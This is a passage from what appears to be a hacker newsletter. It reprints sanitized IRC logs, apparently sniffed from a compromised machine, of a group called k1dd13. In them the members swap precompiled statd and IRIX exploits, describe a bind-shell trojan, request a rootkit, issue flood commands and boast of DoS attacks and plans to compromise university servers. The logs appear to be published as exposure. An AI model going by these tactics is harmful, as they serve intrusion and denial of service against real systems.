may have an account on it. Homepage is www.magix.com.sg 5. [root@apollo /]# nslookup irc.powersurf.com : Most likely hangs around on that server.. probably in channels like #singapore or singapore, NUS related. EoF @HWA The script kids chat logs sniffed from compromised system : #4 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (Sanitized) Day 01 - June 4 :D1ck :hello J4n3 :J4n3 :hello D1ck :J4n3 :i called u , u weren't there :J4n3 ::) :D1ck :oh :D1ck :i just got back from dinner. :D1ck ::/ :D1ck :sup sup? :J4n3 :heh :J4n3 :nothin much :J4n3 :yaar that ifup wasn't connecting :J4n3 :i did it throug kppp of kde :D1ck :oye :D1ck :i am making a elite archieve of sploits just for k1dd13 members :D1ck :can u make pass protection on sites? :J4n3 :D1ck u talkin to me ? 
:D1ck :yea :J4n3 :yeah i can make it password protected :J4n3 :cgi script :D1ck :ls ftp :D1ck :bd bnc botpack clone dos exploit kit local login scan sniff spoof :D1ck :cool :D1ck :ok :D1ck :i have an account on www.example.com :J4n3 :hehe kewl :D1ck :when i boot i`ll give j00h the pass :D1ck :make sure it's leet i dont want any other person other then u me m4ry mi||er and glitchX to have access :D1ck ::P :D1ck :hehe :D1ck :all leet stuff :J4n3 :y0 hooo :J4n3 :ha ha :J4n3 :d0n worry boss :D1ck :hehehe :D1ck ::) :J4n3 :tight :J4n3 :kewl :J4n3 :zabardasth :p :D1ck :=P :D1ck :u have any stuff u wana get added? :J4n3 :not any thin speciall yaar wahi common sploits :J4n3 :but yeah :J4n3 :i'm gonna grab some from doc :J4n3 :then i'll ad them there :D1ck :? :D1ck :cool :D1ck :doc never gives :( :D1ck :or does he :D1ck :hehe :D1ck :ok :J4n3 :heeh yeah he does :J4n3 :he offered me , but maiany khud hee manga nahi kabi :J4n3 :just once i asked him for statd :J4n3 :he gave me a linux version of it :D1ck :wow.c :D1ck :? :D1ck :wow.c is VERY VERY VERY VERY OLD :D1ck :wow.c is VERY VERY VERY VERY OLD :J4n3 :hhaah yeah :J4n3 :he gave me 2 :J4n3 :wow and another 0-day production :D1ck : Signon by h4r33 :D1ck :OCENTER.SKYINET.NET at 10:08pm :D1ck : wow and another 0-day production :D1ck :wow is not 0-day :D1ck :its old :D1ck :whats the other? :J4n3 :wait :D1ck :hehe :D1ck :nope yaar :J4n3 :[root@example portedfor]# ./statd-new :J4n3 :Legion 2000 Security Research 0-day Productions :J4n3 : New Modified statd remote exploit - ironlungs@wireco.net :J4n3 :sage: ./statd-new [host_name] [remote_cachename] [command] :D1ck :hmmmmm :D1ck :cool :D1ck :can u send me? :D1ck :0x9 098e 9x / :J4n3 :why not honey :J4n3 :;) :D1ck :k thanks :D1ck : who the fuck removed my xs again ? :D1ck :HAHAHAHA :J4n3 :hahahahha :D1ck :d4v3 :D1ck : send me the .c :J4n3 :don have it :J4n3 :i got compiled one :D1ck :man it could be a trojan? 
:J4n3 :i got all these compiled
:D1ck :they can direct shell code to localhost, 12.0.0.1
:J4n3 :haha naaa
:D1ck :not many good coders can read it.
:J4n3 :its not 100 %
:D1ck :heh well ok
:J4n3 :meri guarantie "my guarantee"
:D1ck :send me the other 0-day
:D1ck :kewl
:D1ck :does it work
:J4n3 :i got all these already compiled
:D1ck :?
:J4n3 :yyeah it does but mostly boxes r patched
:J4n3 :[root@example portedfor]# ls
:J4n3 :admmount imapx mountd pcnfsd_remote rotshb statd-new
:J4n3 :boot listen nameserver ported_f.zip smbmount wow
:J4n3 :dipx lsx nisd robo solbind
:D1ck :heh ok
:J4n3 :and yeah wait
:J4n3 :[root@example 0-day]# ls
:J4n3 :core fbo.c ob_accou.c prout rh6mountd.c rpc-autofsd sdi
:D1ck :okies
:D1ck :hahah kewl
:D1ck :/dcc send me if u can/want :/
:J4n3 :kon kon sa baijon ? all ? "which ones should I send? all?"
:D1ck :tar -zcvf 0-day.tar.gz 0-day
:J4n3 :what the tar command lemme tar the 0-day folder
:D1ck : /dcc send D1ck 0-day.tar.gz
:D1ck :hehe
:D1ck : tar -zcvf 0-day.tar.gz 0-day
:D1ck :rr heh
:J4n3 :oye
:D1ck :yo
:J4n3 :i downloaded a file from packetstorm
:J4n3 :name was ALL-EXPLOITS-1999
:D1ck :yep?
:J4n3 :6 mb file
:J4n3 :ALL-EXPLOITS-199.tar.gz
:J4n3 :ALL-EXPLOITS-1999.tar.gz
:J4n3 :too many sploits in them
:J4n3 :it made 10 folders
:J4n3 :every folder contains different sploits
:D1ck :ok and?
:J4n3 :i mean to say u also download it, shayed kaam kee cheez niklay "maybe something useful will turn up"
:D1ck :oh accha "oh okay"
:D1ck :give me the url
:D1ck :yaar most exploits are dummies or trojans remember
:D1ck :or they have bugs
:D1ck :only a few work
:D1ck :only a few work
:J4n3 :packetstorm.securify.com look in main page at top 20 recent files
:D1ck :errr
:J4n3 :yeah i know
:D1ck :send me i`ll put important ones in there
:D1ck :okies
:D1ck :suspicious code
:D1ck :rhmountd.c
:D1ck :checking
:J4n3 :kkz
:D1ck :did they compile?
:D1ck :ah
:D1ck :IRIX
:J4n3 :that account.c ?
:D1ck :yep
:J4n3 :yeah i heard its a great program
:J4n3 :it remotely adds login and pass on IRIX system
:D1ck :hmmmm
:D1ck :i think its locally
:J4n3 : SGI objectserver "account" exploit */
:J4n3 : Remotely adds account to the IRIX system. */
:J4n3 : Tested on IRIX 5.2, 5.3, 6.0.1, 6.1 and even 6.2,
:D1ck :kewl kewl
:D1ck :Oh this is the 0-day
:D1ck :Oh this is the 0-day
:J4n3 :yeah
:D1ck :leet
:D1ck :does it compile?
:J4n3 ::p
:J4n3 :on irix i think
:D1ck :haha ok
:D1ck :# uname -a;
:D1ck :id
:D1ck :IRIX delta 5.3 11091811 IP19 mips
:D1ck :# uid=0(root) gid=0(sys)
:D1ck :#
:D1ck :HAHAHAHAH
:D1ck :don't get excited, i`m joking :/
:D1ck :hehe
:J4n3 :hahahah
:J4n3 :COOOOL
:J4n3 :it works haaan "right?"
:J4n3 :where did u compile it ? on IRIX system ?
:D1ck :hehehhe
:D1ck :i am kidding
:D1ck :oe
:D1ck :oye
:D1ck ::)
:J4n3 :lol
:J4n3 :yeah ?
:J4n3 :des|re .join #tr1be grepbitch
:D1ck :oye
:D1ck :send yure brother
:J4n3 :yeah
:D1ck :the url
:D1ck :to that 6mb exploit file
:D1ck :heh
:J4n3 :my brother ?
:D1ck :me
:D1ck ::)
:D1ck : my brother ?
:D1ck : me
:J4n3 :hahaha
:J4n3 :sure sure
:D1ck ::)
:D1ck :LOL
:J4n3 :hehe
:D1ck :J4n3
:D1ck :give me some machine
:D1ck :i`ll sploit it
:D1ck :irix
:D1ck :this way bots remember.

-=- Day 02 June 5

:D1ck :miller
:D1ck :;)
:b0b :commerce?
:b0b :lame nick ;-)
:D1ck :?
:b0b :d1ckey
:D1ck :heh
:D1ck :welp
:D1ck :one bot from one box
:D1ck :we dont have nicks
:D1ck :so we name it from the ops
:D1ck :hehe
:D1ck :ips
:D1ck : commerce (~werd@commerce.example.COM) (I
:b0b :lol
:b0b :ath0 my phriend
:D1ck :so what's up b0b
:D1ck ::/
:D1ck :commerce nick ath0
:D1ck :i coded ath0.c
:b0b :kewl
:D1ck :there was no need
:D1ck :but
:D1ck :i was bored
:D1ck :accept my stuff
:b0b :cut/paste?
:D1ck :nope
:D1ck :coded my self
:D1ck :m4ry coded an elite port 80 httpd 0-day trojan
:D1ck :he is mad elite in C
:b0b :i know.. i was asking you to cut/paste the relevant code :-)
:D1ck :heh
:D1ck :bd.tar.gz is a backdoor for bindshell, i made that too
:D1ck ::)
:b0b :uff truncated
:b0b :kewl
:D1ck :don't distro vortex3.c, its not mine :/
:D1ck :hehe
:D1ck : uff truncated
:D1ck :i didn't understand what that word means :/
:D1ck :be EASY ON ENGLISH WITH ME #@#$@#$@#%$#@
:D1ck ::)
:b0b :what's vor-ticks-3?
:b0b :hehe
:b0b :chud gai thee "it got screwed up"
:b0b :carriage returns
:D1ck :A TROJAN
:D1ck :on receiving a string
:D1ck :on port 80
:D1ck :it opens a bind shell
:D1ck :like on a string 'asad'
:D1ck :it opens port 234323,
:D1ck :or some thing
:D1ck :hehehe
:D1ck :LOL
:b0b :bhai jaan.. "dear brother.."
:b0b :if it is in c.. do some ereet shiats like subnet pinging with ath0 etc.
:D1ck :y0h f0h b4r
:b0b :would be a whole lot faster than a bash script
:b0b :me and angie already did the subnet ping shiats etc.
:b0b :but C would rawk
:b0b :0wn even
:D1ck :yep
:D1ck :i`ll do it
:b0b :kewl
:D1ck :but
:D1ck :shell script is a better idea.
:D1ck :or i'll have to write code for gethostname()
:b0b :and make it fork to background eggdrop ishtyle :-) "eggdrop style"
:b0b :and loop
:D1ck :and work on errors
:D1ck :hehe
:D1ck :yep
:b0b :so if we wanna fux0r one isp.. all we do is ./fuck
:b0b :so if we wanna fux0r one isp.. all we do is ./fuck
:D1ck : DCC Auto-closing idle dcc SEND to b0b
:D1ck :bind,sock.
:D1ck :ah
:D1ck :yep
:b0b :do the gethostbyname() shiats foo
:b0b :or what good are ur m4d C skillz?
:b0b :send again
:b0b :btw, i'm going to be learning C soon too inshallah "God willing"
:b0b :then we'll have C fights
:b0b :yipeeee
:b0b :i'll insult you in code
:b0b :kekekeke
:D1ck :i`ll do it ;)
:D1ck :i made this ftp site i`ll upload it
:D1ck :just for k1dd13, all private stuff
:D1ck :ls /root/ftp
:D1ck :bd botpack dos hack-irc-session local scan spoof
:D1ck :bnc clone exploit kit login sniff
:D1ck :oki
:D1ck :i`ll do
:D1ck :hahahaha
:b0b :and once we develop m4d C skillz.. we'll develop D
:D1ck :kekekeke
:b0b :the ultimate in URDU coding
:b0b :eeeeeeeeeeeekekekekekekekekekeke
:b0b :grep == dhoond "dhoond = search"
:b0b :no no
:b0b :find == dhoond "dhoond = find"
:b0b :locate == madarcho-dhond "motherfucker-find"
:m4ry :MILLER@&*(#^*(@%^#*(&@
:b0b :export == duramad "duramad = export"
:b0b :m4ry
:b0b :i was just doing some concept shiats for D
:b0b :the ultimate in URDU coding
:b0b :the base for urdunix
:m4ry :HAHAHAHAHAHAHAHAHAHAHAH
:b0b :export == duramad
:b0b :find == dhoond
:b0b :locate == madarchod-dhoond
:b0b :exit == lun "dick"
:b0b :BitchX == kutti "bitch"
:b0b :eehee
:b0b :first.. lets develop BitchX in URDU
:b0b :KuttiX
:m4ry :l33t
:m4ry :run == bhago "bhago = run"
:m4ry :LOL
:m4ry :HAHAHAHA
:m4ry :KuttiX.. LOL
:b0b :eehee
:b0b :./kick == /thudda "thudda = kick"
:m4ry :D1ck
:D1ck :miller
:D1ck :u there?
:D1ck :i got d/c
:b0b :./op ==/ooperbitha "sit on top"
:D1ck :some one is dosing me :)
:b0b :no.. it's my friend bubloo
:b0b :OF COURSE I'M HERE DAMMIT
:D1ck :m4ry
:D1ck :m4ry
:b0b :btw guys...
:D1ck :y0h
:b0b :guess how many hosts i have in my bclist?
:D1ck :b0b how many?
:D1ck :udp flood > *
:m4ry :.yo yo
:m4ry :b0b: 28
:m4ry :b0b: 5
:D1ck :it literally rapes bandwidth.
:m4ry :how close am i?
:m4ry :# telnet napster.com 80
:m4ry :Trying 208.184.216.230...
:m4ry :Connected to napster.com.
:m4ry :Escape character is '^]'.
:m4ry :HEAD / HTTP/1.1
:m4ry :SYN FLOOD > *
:b0b :phuck yew
:D1ck :heh m4ry
:b0b :2066 bloody
:m4ry :b0b: how many?
:b0b :the scan is reaheaheaheahly slow
:m4ry :HAHAHAHA
:m4ry :aww
:m4ry :ur not l33t :P~
:m4ry :l33t hax0rs have 3 bcasts
:m4ry :which return thouussannndsss of pings
:m4ry :(in my dreams)
:m4ry :hehe
:b0b :ehehehehe
:b0b :this is one BIG ass bc
:b0b :who wants a taste?
:b0b :just 100 pings?
:D1ck :HAHAHAHAH
:D1ck :syn 0wns y3w niggah
:D1ck ::
:D1ck :HAHAHAHAHAHA
:D1ck :g|ngah
:D1ck :b0b: take broadscan by pshysoid
:D1ck :NOT ME
:D1ck :
:D1ck ::)
:D1ck :me and J4n3 and m4ry have TONS TONS TONS bandwidth :/
:D1ck :we use it on h4r33
:D1ck :heh
:D1ck :h4r33 is ultra lame
:D1ck :
:b0b :lol
:D1ck :not worth a thought
:D1ck ::)
:D1ck :hehe
:D1ck :cricket match is funny
:b0b :damn
:b0b :gotta jet
:b0b :later all
:b0b :fuck cricket
:b0b :winuke their arses
:b0b :laters
:D1ck :heh
:D1ck : damn
:__m4ry :someone traceroute 192.168.4.191 UDP port 53
:__m4ry :aww
:__m4ry :he ran away again
:__m4ry :__m4ry is viper@192.168.252.32 * 3r33t hackers don't read mIRC.doc
:__m4ry :HEHE
:D1ck : gotta jet
:D1ck : later all
:D1ck : fuck cricket
:D1ck : winuke their arses
:D1ck : SignOff b0b:
:D1ck : ])
:D1ck :he's gone for another 4 months
:D1ck :HEHE
:D1ck :hhahaha
:D1ck :;)
:D1ck :m4ry
:D1ck :help me
:D1ck :sysop:(
:HeatAz :yeah
:HeatAz : :
:HeatAz ::/
:D1ck :hehehe
:m4ry :helping
:m4ry :sup?
:D1ck :hahaha
:m4ry :LOL
:D1ck :well
:D1ck :cat world | grep -v sysop > hell
:D1ck :PLEASE
:D1ck :;)
:D1ck ::(
:m4ry :lol
:m4ry :egrep sysop /dev/world > /dev/hell
:D1ck :heh
:D1ck :m4ry
:D1ck :i`m making a mad elite
:D1ck :ftp site
:m4ry :D1ck..
:m4ry :could u please traceroute 192.168.4.191 -p 53
:m4ry :?
:D1ck :just for among us
:D1ck :its got every thing
:D1ck :# ls
:D1ck :bd botpack dos hack-irc-session local scan spoof
:D1ck :bnc clone exploit kit login sniff
:D1ck :k
:D1ck :traceroute to 192.168.4.191 (192.168.4.191), 30 hops max, 38 byte packets
:D1ck : 1 192.168.232.254 (192.168.232.254) 148.127 ms 151.760 ms 160.238 ms
:D1ck : 2 192.168.232.3 (192.168.232.3) 154.337 ms 138.676 ms 139.853 ms
:D1ck : 3 192.168.244.30 (192.168.244.30) 226.507 ms 225.720 ms
:D1ck : 3 192.168.244.30 (192.168.244.30) 226.507 ms 225.720 ms *
:D1ck : 4 192.168.129.13 (192.168.129.13) 1170.320 ms 1041.645 ms 1221.868 ms
:D1ck :m4ry
:D1ck :u have any thing elite to contribute there?
:D1ck :[Sysop_(~sys@example.com)] hey
:D1ck :YOH HA NA
:D1ck :ROXZ
:D1ck :HE JUST HIT A SIX
:D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
:b0b :brb, reading mail etc.
:b0b :ACTION is idle, mail shail [bX(l/on p/on)]
:D1ck :J4n3
:J4n3 :hmmm
:J4n3 :oye miller was here ?
:D1ck :0 J4n3
:D1ck :y0 J4n3
:D1ck :yep
:D1ck :millah was here.
:D1ck ::)
:J4n3 :ohhh
:J4n3 :missed him
:J4n3 ::(
:J4n3 :D1ck gimme an elite rootkit for linux
:D1ck :hehe
:J4n3 :same like sparc if u have
:D1ck :h3h
:D1ck :oki d0kies
:D1ck :i will have to ftp, i`ll send u at night ok?
:J4n3 :hmm okies, i'm gonna sploit linux boxes of edu
:D1ck :oki dokies
:D1ck :brb booting
:D1ck :to win
:D1ck :g0ne
:J4n3 :kkz
:m4ry :D1ck
:m4ry :you there?
:Sp07 :
:D1ck :hi
:D1ck :i`m gonna be posting k1dd13's site
:D1ck :soon
:D1ck ::)
:D1ck :J4n3
:D1ck :miller send me that web.tar.gz
:D1ck :;)
:Sp07 :oh
:D1ck :i want some one with good writing skillz
:D1ck ::/
:D1ck :to write About, FAQ
:D1ck :etc
:D1ck ::)
:D1ck :Sp07
:D1ck :hmm
:D1ck :PLAYING GAMEs?
:Sp07 :nope
:Sp07 :going to register a channel
:Sp07 :sdgf
:D1ck :hHAHAHAHAH
:D1ck :ok
:Sp07 :
:Sp07 :I should make a game.tcl
:Sp07 :thingy
:Sp07 :majigger
:D1ck :haha
:Sp07 :something
:Sp07 :cool
:Sp07 :how about portscan tcl
:Sp07 :I want to make something new
:D1ck :tell me
:D1ck :is this para right for About
:D1ck :?
:D1ck :K1dd13 came into existence almost a year ago. It was born out of hate and contempt for violence, atrocities and human rights violations against Muslims, especially the affectees in Kashmir. It was precipitated to bring the attention of world leaders and
:Sp07 :?
:D1ck :organizations to the issue in cyberspace which is today the leading source of communication.
:D1ck :is that fair enuff?
:Sp07 :yeah I guess
:Sp07 :I thought it was like a hacking group
:Sp07 :hehe
:Sp07 :not some terrorist group
:D1ck :what should i add.
:D1ck :?
:D1ck :it is a hacking
:D1ck :group
:D1ck :but
:D1ck :hahahahaa
:D1ck :man u dont know kashmir
:D1ck :if u see the pictures
:D1ck :anyway
:D1ck :what else should i add.
:D1ck :?
:Sp07 :add some porn
:D1ck :hha
:Sp07 :what is lahore ?
:D1ck :lahore==city
:D1ck :Sp07 give me a good quote
:Sp07 :I thought it was the whore in french
:Sp07 :ill go get a quote for you
:D1ck :heh
:D1ck :ok
:Sp07 :I dont know any in my head
:Sp07 :hea
:Sp07 :d
:Sp07 :Silence is gold, if nothing better you hold.
:Sp07 :that's gay
:Sp07 :I heard a quote before
:Sp07 :goes something like "If you want peace, you must prepare for war"
:Sp07 :I heard it in a simpsons episode
:Sp07 :name = Stone Cold
:Sp07 :e-mail = **
:Sp07 :homepage = **
:Sp07 :town = ??
:Sp07 :country = ??
:Sp07 :Quote = Don't bring a knife to a gun fight
:Sp07 :hahahaa
:Sp07 :"Never flush the toilet while taking a shower."
:Sp07 :how about Famous Last Words
:Sp07 :-- Abraham Lincoln
:Sp07 : A house divided against itself cannot stand.
:Sp07 : The Bible is not my book, and Christianity is not my religion. I could never give assent to the long,
:Sp07 : complicated statements of Christian dogma.
:Sp07 : You can fool all the people some of the time, and some of the people all the time, but you cannot fool all
:Sp07 : the people all the time.
:Sp07 : My great concern is not whether you have failed, but whether you are content with your failure.
:Sp07 :
:Sp07 :Nearly all men can stand adversity, but if you want to test a man's character, give him power.
:Sp07 : Better to remain silent and be thought a fool than to speak out and remove all doubt.
:Sp07 : Things may come to those who wait, but only the things left by those who hustle.
:Sp07 : Most people are about as happy as they make up their minds to be.
:Sp07 : Tact is the ability to describe others as they see themselves.
:Sp07 : He has the right to criticize who has the heart to help.
:Sp07 :
:Sp07 :I destroy my enemy when I make him my friend.
:Sp07 :While one person hesitates because he feels inferior, the other is busy making mistakes and becoming
:Sp07 : superior.
:Sp07 :New opinions are always suspected, and usually opposed, without any other reason but because they
:Sp07 : are not already common.
:D1ck :hehe
:Sp07 :-- Jay Leno
:Sp07 : If God doesn't destroy Hollywood Boulevard, he owes Sodom and Gomorrah an apology.
:Sp07 :If you want truly to understand something, try to change it.
:Sp07 :there's lots of quotes
:Sp07 :I like lincoln's quotes
:Sp07 :-- Julius Caesar
:Sp07 : I came, I saw, I conquered.
:Sp07 :thats me
:D1ck :hahah
:D1ck :J4n3
:D1ck :when u come back, message me it's important.
:D1ck :wtf
:D1ck :?
:D1ck :J4n3
:D1ck :J4n3
:D1ck :J4n3
:D1ck :Sp07
:D1ck :make me a gRaF|X
:D1ck :http://www9.example.com/k1dd13/'
:Sp07 :send me photoshop and I will do it
:Sp07 :hehe
:D1ck :h3h
:Sp07 :let me go check out the website
:D1ck :(Sp07): let me go check out the website
:D1ck :*** Disconnected
:D1ck :*** Rejoined channel
:D1ck :what did u say after that
:Sp07 :?
:Sp07 :nothing
:D1ck :u like the site
:D1ck :what will u give it out of 10
:D1ck :?
:D1ck :1
:D1ck :?
:D1ck :2
:D1ck :?
:D1ck :3?
:D1ck :0?
:Sp07 :.654564
:Sp07 :hheh
:Sp07 :its ok
:D1ck ::(
:Sp07 :it would be better if it wasnt on a free web thingy
:Sp07 :www.k1dd13.com
:Sp07 :or something
:D1ck :yep
:D1ck :i`m getting it
:D1ck :k1dd13-online.org
:D1ck :www.k1dd13-online.org
:D1ck :it's under construction dude
:D1ck ::P
:D1ck :tons of typos
:D1ck :needs tons of graphic
:D1ck :needs tons of graphics
:D1ck ::)
:Sp07 :oh
:D1ck :have to put perl scripts
:D1ck :tools
:D1ck :archive
:D1ck :tons of work
:D1ck ::;
:D1ck ::;/
:Sp07 :want to make a website for me
:Sp07 :?
:Sp07 :DICKWAD
:D1ck :heh
:Sp07 :hehe
:D1ck :nO
:Sp07 :potheads.net
:D1ck :it's hard
:D1ck :plus i`m getting it made:)
:Sp07 :=(
:D1ck :=(
:Sp07 :any new exploits for redhat 6.1?
:Sp07 :in the last month or so?
:Sp07 :I just want to root my friend's server so I can make my vhost since he's not doing it
:D1ck :lol
:Sp07 :nb
:Sp07 :hey
:Sp07 :Im making an internet search tcl
:_-Ahsan-_ :LOL
:_-Ahsan-_ :was were

-=- Day 03 June 6

:D1ck! :s3ga shit * *
:D1ck! :s3ga shit * *
:D1ck! :s3ga rshit * *
:D1ck! :s3ga rshit * *
:D1ck! :s3ga rshit * *
:D1ck! :s3ga shit * *
:D1ck! :s3ga shit * *
:D1ck! :s3ga rshit * *
:D1ck! :.shit * *
:D1ck! :.shit * *
:D1ck! :s3ga help shit
:D1ck! :.shit * *
:D1ck! :back
:D1ck! :J4n3
:D1ck! :u there?
:D1ck! :J4n3: WHEN U COME BACK, msg ME , it's important
:D1ck! :J4n3: WHEN U COME BACK, msg ME , it's important
:D1ck! :J4n3: WHEN U COME BACK, msg ME , it's important
:J4n3! :D1ck ma back
:D1ck! :mah bOy
:D1ck! :mah bOy
:D1ck! :mah bOy
:D1ck! :done graph1x?
:J4n3! :graphix tho already hain, i'm workin on that java and password cgi "the graphics are already done"
:J4n3! :downloaded too many scripts, and experimenting with them
:J4n3! :hey d1ck wanted to ask u something
:D1ck! :oki
:J4n3! :tomorrow thak page ready hojayega with graphics java and cgi password protected "the page will be ready by tomorrow, with graphics, java and cgi password protection"
:J4n3! :ok listen ek system aisa hai kay jo sploits page hoga uska name password hoga "ok listen, here's a system: whatever the name of the sploits page is will be the password"
:J4n3! :i mean if page name is sploit898.html
:J4n3! :that would be the pass
:J4n3! :if someone clicks on sploits link
:J4n3! :another window will appear
:J4n3! :and it will ask for password
:J4n3! :if someone knows that html page name then it will go through
:J4n3! :otherwise it wont
:J4n3! :what u say ?
:D1ck! :oh
:D1ck! :welp
:D1ck! :dunno u choose
:D1ck! ::P
:J4n3! :and yeah that banner change script be mila hai it will change at least 5 graphics "and yeah, I also found that banner change script, it will change at least 5 graphics"
:D1ck! :yep okies
:D1ck! :cool
:J4n3! :i mean 5 banners u can select it will change everytime
:D1ck! :;)
:J4n3! :heh its complicated workin with cgi and java :/
:D1ck! :hehe
:D1ck! ::?
:D1ck! ::/
:J4n3! :haha i like ur chat style
:J4n3! ::?
:J4n3! ::/
:J4n3! :hehe
:J4n3! :tight
:J4n3! :yaar that synflood is tight
:J4n3! :u know some hackphreak guy took over deathace's nick 2 weeks ago
:J4n3! :with his bot with ip *
:D1ck! :YEP
:D1ck! :yep i know i dossed him 2 times
:D1ck! :he is linuxsex ka guy "he's a linuxsex guy"
:D1ck! :;)
:D1ck! :yup
:J4n3! :hahah lol
:J4n3! :i dossed him from 9 rewts
:J4n3! :he went down for 7 hours
:J4n3! :lol
:J4n3! :all his domain example.com was down
:D1ck! :wow
:D1ck! :HAHAHAHAHAHAHAHA
:D1ck! :kewl
:D1ck! :;)
:J4n3! :haha yeahh
:J4n3! :i got his nick back u can see it in #k1dd13
:D1ck! :cool cool
:D1ck! :;)
:D1ck! :oye
:D1ck! :attrition.org say saray mirror akathain karnay hain "we have to collect all the mirrors from attrition.org"
:D1ck! :attrition.org say saray mirror akathain karnay hain
:D1ck! :yep
:D1ck! :i see
:J4n3! :ahaan no problem
:J4n3! :ahaan no problem
:J4n3! :karlaingay "will do"
:J4n3! :yaar worldtel sux
:J4n3! :it sux all the day only works fine in morning :(
:D1ck! :*** D1ck changes topic to 'kipitipa nipamipa jipa sepa bah bah blah........'
:D1ck! :(@J4n3): ahaan no problem
:D1ck! :(@J4n3): karlaingay
:D1ck! :*** Disconnected
:D1ck! :*** Rejoined channel
:D1ck! :
:D1ck! : (#k1dd13) topic- 'kipitipa nipamipa jipa sepa bah bah blah........'
:D1ck! : (#k1dd13) topic- set by D1ck (Tue 6th Jun 2000 10:03p)
:D1ck! :HAFEZ
:D1ck! :world TEL sucks
:D1ck! :
:D1ck! :wOrlDtEl suXx
:J4n3! :yeah yeah yeah
:J4n3! :it does
:J4n3! :it does
:J4n3! ::(
:J4n3! ::(
:J4n3! ::/
:J4n3! :only rox in morning
:J4n3! :sux all the day
:D1ck! :hahahaha
:D1ck! :hmmmmmmmmmm
:D1ck! :hehe
:D1ck! :http://www9.example.com/k1dd13/Article3.html
:D1ck! :send me the graphix.jpg
:D1ck! ::)
:D1ck! :the elite 'K1dd13 Online' one
:J4n3! ::/
:J4n3! :satnet is lot better yaar
:J4n3! :it only sux in night e or r hours
:J4n3! :errr i made only of THE K1dd13 :/
:J4n3! :oye tell me how do i mount my drive d ?
:D1ck! :http://www9.example.com/k1dd13/Article3.html
:D1ck! :d:
:D1ck! :?
:J4n3! :hmmm let me check
:D1ck! :mount /mnt/cdrom
:J4n3! :yaar drive d
:D1ck! :mount -t msdos /dev/fd0 /mnt/floppy
:J4n3! :no no
:D1ck! :mount -t vfat /dev/hda1 /mnt/win
:J4n3! :for mounting drive c i write mount -t msdos /dev/hda1 /mnt
:D1ck! :?
:D1ck! :cd
:D1ck! :(@J4n3): for mounting drive c i write mount -t msdos /dev/hda1 /mnt
:D1ck! :i write
:D1ck! :mount -t vfat /dev/hda1 /heh
:J4n3! :i have partitions c d and e
:J4n3! :by using above command it mounts drive c but not d and e , cd is drive g
:D1ck! :mkdir hh
:D1ck! :mkdir heh
:J4n3! :heh but it works
:D1ck! :hahaha
:D1ck! :ok
:D1ck! :i know
:D1ck! :do this 'df'
:D1ck! :and paste me
:D1ck! :and then df -k
:J4n3! :wait
:J4n3! :Filesystem 1k-blocks Used Available Use% Mounted on
:D1ck! :what is yure d? /dev/hda2?
:D1ck! :what is yure d? /dev/dba1
:D1ck! :?
:J4n3! :.Filesystem 1k-blocks Used Available Use% Mounted on
:J4n3! :./dev/hda8 1935132 878956 957780 48% /
:J4n3! :./dev/hda7 23302 2650 19449 12% /boot
:J4n3! :./dev/hda1 2064032 1230496 833536 60% /mnt
:D1ck! :oki
:D1ck! :mkdir /win; mount -t vfat /dev/hda2 /win
:D1ck! :wait, what is /dev/hda7
:D1ck! :?
:J4n3! :linux swap partition
:D1ck! :ok
:D1ck! :mkdir /win; mount -t vfat /dev/hda2 /win
:J4n3! :hda8 is native
:D1ck! :do this and tell me what u get
:D1ck! :yep yep
:J4n3! :[root@example portedfor]# mkdir /win; mount -t vfat /dev/hda2 /win
:J4n3! :[MS-DOS FS Rel. 12,FAT 0,check=n,conv=b,uid=0,gid=0,umask=022,bmap]
:J4n3! :[me=0x0,cs=0,#f=0,fs=0,fl=0,ds=0,de=0,data=0,se=0,ts=0,ls=0,rc=0,fc=4294967295]
:J4n3! :Transaction block size = 512
:J4n3! :VFS: Can't find a valid MSDOS filesystem on dev 03:02.
:J4n3! :mount: wrong fs type, bad option, bad superblock on /dev/hda2,
:J4n3! : or too many mounted file systems
:J4n3! : (aren't you trying to mount an extended partition,
:J4n3! : instead of some logical partition inside?)
:D1ck! :hmm
:D1ck! :u have to know what is yure d:
:D1ck! :c == /dev/hda1
:D1ck! :d == /dev/???/
:D1ck! :dba1
:D1ck! :hda1
:D1ck! :etc
:J4n3! :hmmm /dev/hda2 i think
:D1ck! :oye brb booting to linux
:J4n3! :ok
:D1ck! :then it should mount
:D1ck! :oye brb booting to linux
:D1ck! :oye brb booting to linux
:J4n3! :so bol raha hon "that's what I'm saying"
:D1ck! :yo
:D1ck! :back
:D1ck! :J4n3
:D1ck! :there?
:D1ck! : [Lag 156]
:J4n3! :yaar neechay gaya huwa tha "dude, I had gone downstairs"
:D1ck! :fuck
:D1ck! :worldtel sux
:D1ck! :oh god
:D1ck! :welp
:D1ck! :i`m fucking lagged
:D1ck! :Inspectah
:D1ck! :w00p
:D1ck! :sup dis
:Sp07! :having trouble making this tcl script and nobody has a brain to help me
:D1ck! :hehe
:D1ck! :tell me some thing to code
:D1ck! :man
:D1ck! :worldtel sucks
:D1ck! :Sp07
:Sp07! :?
:Sp07! :d1ck
:Sp07! :d1ck
:D1ck! :supa boh
:D1ck! :man
:D1ck! :IRIX
:Sp07! :?
:D1ck! :u have a scanner for IRIX?
:Sp07! :nope
:D1ck! :i wana own boxes with object-something.c
:D1ck! ::)
:Sp07! :object-something?
:Sp07! :umm just use solaris or linux box to scan
:D1ck! :heh
:D1ck! :yeah
:D1ck! :i forgot that name
:D1ck! :how did u own that IRIX box?
:D1ck! :no to scan
:D1ck! :i wana own IRIX
:D1ck! :i need boxes to own ;)
:Sp07! :I dont remember
:Sp07! :delta something something.edu
:Sp07! :heh
:Sp07! :iit.edu
:D1ck! :k
:Sp07! :just scan from redhat
:Sp07! :doesnt matter where you scan from
:D1ck! :hehe yep
:Sp07! :why the fuck are they letting taddpole in linuxsex
:Sp07! :hehe
:D1ck! :no no
:Sp07! :are they trying to suck oper dick or something?
:D1ck! :err, i know that dude
:D1ck! :i want IRIX boxes address so i can ./own irix-box-address.com
:D1ck! :Hahahhahah
:D1ck! :dunno
:D1ck! :i was wondering
:Sp07! :oh
:D1ck! ::)
:Sp07! :I dont think every irix box is vulnerable
:Sp07! :heh
:Sp07! :what port does it connect to?
:Sp07! :kcnet.org = irix
:D1ck! :(@Sp07): I dont think every irix box is vulnerable
:D1ck! :(@Sp07): heh
:D1ck! :*** Disconnected
:D1ck! :*** Rejoined channel
:D1ck! :fuck
:D1ck! :my isp
:Sp07! :[03:21] heh
:Sp07! :[03:22] what port does it co
